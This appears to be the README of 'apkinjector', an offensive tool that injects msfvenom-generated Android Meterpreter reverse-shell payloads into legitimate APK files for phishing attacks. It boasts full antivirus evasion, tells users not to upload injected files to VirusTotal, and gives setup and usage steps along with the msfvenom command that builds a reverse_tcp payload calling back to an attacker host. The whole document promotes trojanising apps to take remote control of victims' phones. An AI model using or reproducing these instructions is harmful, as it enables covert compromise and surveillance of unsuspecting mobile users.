


This script is no longer supported. Please use APKWash.

<br><br> Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks. <br><br> <b> -- Please do not upload "injected" files to VirusTotal.com -- </b><br> <br> <br> <b>Success Rate:</b><br> -100% AV Evasion to date (0/35 on nodistribute, confirmed on AVG and Kaspersky mobile)<br> -~70% automatic injection<br> -May require user input, or manually adding the invoke command. The output will explain what is needed.<br> -If APKTool fails to decompile, or compile, then the injection will fail. On major apps like Facebook, Starbucks, etc you may find this to happen.<br> <br> <br> <b>Setup:</b><br> chmod +x apkinjector<br> mv apkinjector /usr/local/bin/.<br> <br> <b>On first run:</b><br> -Downloads and places apktool.jar in the user's /usr/local/bin directory<br> -Generates debug keystore for signing. Places it in ~/.android/<br> <b>NOTE:</b> If wanting to customize each signature, then remove the keystore before running the script.<br> <br> <b>Usage:</b><br> apkinjector <payload>.apk <original>.apk<br> <br> <b>Input:</b><br> This script takes a msfgenerated payload as input along with an .apk you want to inject into.<br> To generate the payload: msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o <payload>.apk<br> <br> <b>Output:</b><br> injected_<original>.apk<br> <br> <b>Debugging</b><br> Comment out the removal of the /tmp/payload and /tmp/original directories to see the file structure that was compiled.<br>